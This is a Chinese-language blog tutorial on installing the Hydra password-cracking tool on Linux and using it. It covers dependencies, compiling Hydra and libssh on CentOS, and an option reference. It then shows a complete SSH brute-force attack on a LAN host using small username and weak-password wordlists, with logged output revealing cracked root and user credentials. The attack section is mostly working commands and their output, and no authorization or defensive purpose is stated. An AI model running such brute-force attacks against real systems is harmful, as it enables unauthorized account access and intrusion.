linux暴力密码破解工具hydra安装与使用

hydra是著名黑客组织thc的一款开源的暴力密码破解工具，可以在线破解多种密码。
这款暴力密码破解工具相当强大，支持几乎所有协议的在线密码破解，其密码能否被破解关键在于字典是否足够强大。

1.安装相关依赖包

如果是Ubuntu/Debian系统，执行如下：

apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev libncurses5-dev hydra

Debian和Ubuntu发行版，源里自带hydra，直接用apt-get在线安装。

如果是Redhat/Fedora系统，执行如下：

yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel

如果是OpenSuSE系统，安装如下：

zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel

我自己用的 CentOS 6.5 (Final)，执行yum install 后相关依赖包安装情况如下：

[root@leiliufeng ~]# rpm -qa openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
postgresql-devel-8.4.20-1.el6_5.x86_64
subversion-devel-1.6.11-10.el6_5.x86_64
pcre-devel-7.8-6.el6.x86_64
openssl-devel-1.0.1e-30.el6_5.2.x86_64
[root@leiliufeng ~]#

2.hydra编译安装
# wget
# tar zxvf hydra-7.4.1.tar.gz
# cd hydra-7.4.1
# ./configure
# make && make install

注：# ./configure 会检测当前系统一些组件配置，主要是对于破解支持模块的检测，可根据需要安装对应的支持库和依赖包。


安装完执行时可能会出现错误信息：:hydra: error while loading shared libraries: libssh.so.4: cannot open shared object file: No such file or directory
如果是ubuntu系统的话，直接apt-get install cmake libssl-dev就可以了。但我系统的centOS，没有找到libssl-dev这东西，于是手动编译了libssh。如下：

[root@leiliufeng ~]#
# yum install cmake
# cd /usr/local/src
# wget
# tar zxf libssh-0.4.8.tar.gz
# cd libssh-0.4.8
# mkdir build
# cd build
# cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..
# make
# make install
# /sbin/ldconfig  //要执行这句，不然会出现hydra: error while loading shared libraries: libssh.so.4: cannot open shared object file: No such file or directory

然后重新编译hydra
cd到/usr/local/src/hydra-7.4.2下(我的之前安装在了这个目录)

[root@leiliufeng hydra-7.4.2]# make clean
rm -rf xhydra pw-inspector hydra *.o core *.core *.stackdump *~ Makefile.in Makefile dev_rfc hydra.restore arm/*.ipk arm/ipkg/usr/bin/* hydra-gtk/src/*.o hydra-gtk/src/xhydra

hydra-gtk/stamp-h hydra-gtk/config.status hydra-gtk/errors hydra-gtk/config.log hydra-gtk/src/.deps hydra-gtk/src/Makefile hydra-gtk/Makefile
cp -f Makefile.orig Makefile
[root@leiliufeng hydra-7.4.2]#./configure
[root@leiliufeng hydra-7.4.2]#make && make install

有关参数：

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户，对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写，指定密码破解，少用，一般是采用密码字典。
-P FILE 大写，指定密码字典。
-e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。
-C FILE 使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数，默认为16。
-w TIME 设置最大超时的时间，单位秒，默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名，支持的服务和协议：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql

oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。
OPT 可选项


使用：
1.手动创建用户名字典和密码字典，这里只是为了演示，只加了几个用户名和弱口令。真正破解时，需要利用密码字典生成器生成强大的字典

[root@leiliufeng ~]# cat users.txt
root
leiliufeng
wangsen
jianxuguang
taolele
[root@leiliufeng ~]# cat passwd.txt
123456
e5r4e56
leiliufeng
54645@@
edfeAS
4546_Dfd
[root@leiliufeng ~]#



2.破解ssh：
# hydra -L users.txt -P passwd.txt -t 1 -vV  192.168.5.133 ssh

[root@leiliufeng ~]# hydra -L users.txt -P passwd.txt -t 1 -vV -o save.log 192.168.5.133 ssh
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra () starting at 2014-10-28 18:10:59
[DATA] 1 task, 1 server, 30 login tries (l:5/p:6), ~30 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.5.133 - login "root" - pass "123456" - 1 of 30 [child 0]
[22][ssh] host: 192.168.5.133   login: root   password: 123456
[ATTEMPT] target 192.168.5.133 - login "leiliufeng" - pass "123456" - 7 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "leiliufeng" - pass "e5r4e56" - 8 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "leiliufeng" - pass "leiliufeng" - 9 of 30 [child 0]
[22][ssh] host: 192.168.5.133   login: leiliufeng   password: leiliufeng
[ATTEMPT] target 192.168.5.133 - login "wangsen" - pass "123456" - 13 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "wangsen" - pass "e5r4e56" - 14 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "wangsen" - pass "leiliufeng" - 15 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "wangsen" - pass "54645@@" - 16 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "wangsen" - pass "edfeAS" - 17 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "wangsen" - pass "4546_Dfd" - 18 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "jianxuguang" - pass "123456" - 19 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "jianxuguang" - pass "e5r4e56" - 20 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "jianxuguang" - pass "leiliufeng" - 21 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "jianxuguang" - pass "54645@@" - 22 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "jianxuguang" - pass "edfeAS" - 23 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "jianxuguang" - pass "4546_Dfd" - 24 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "taolele" - pass "123456" - 25 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "taolele" - pass "e5r4e56" - 26 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "taolele" - pass "leiliufeng" - 27 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "taolele" - pass "54645@@" - 28 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "taolele" - pass "edfeAS" - 29 of 30 [child 0]
[ATTEMPT] target 192.168.5.133 - login "taolele" - pass "4546_Dfd" - 30 of 30 [child 0]
[STATUS] attack finished for 192.168.5.133 (waiting for children to complete tests)
1 of 1 target successfully completed, 2 valid passwords found
Hydra () finished at 2014-10-28 18:11:41
可以看到，破解成功，直接显示结果。也可以使用 -o 选项指定结果输出文件。

[root@leiliufeng ~]# cat save.log
# Hydra v7.4.2 run at 2014-10-28 18:13:45 on 192.168.5.133 ssh (hydra  -L users.txt -P passwd.txt -t 1 -vV -o save.log 192.168.5.133 ssh[22][ssh] host: 192.168.5.133   login:

root   password: 123456
[22][ssh] host: 192.168.5.133   login: leiliufeng   password: leiliufeng

从上面的save.log可以看出：
用户名：root        密码：123456
用户名：leiliufeng  密码：leiliufeng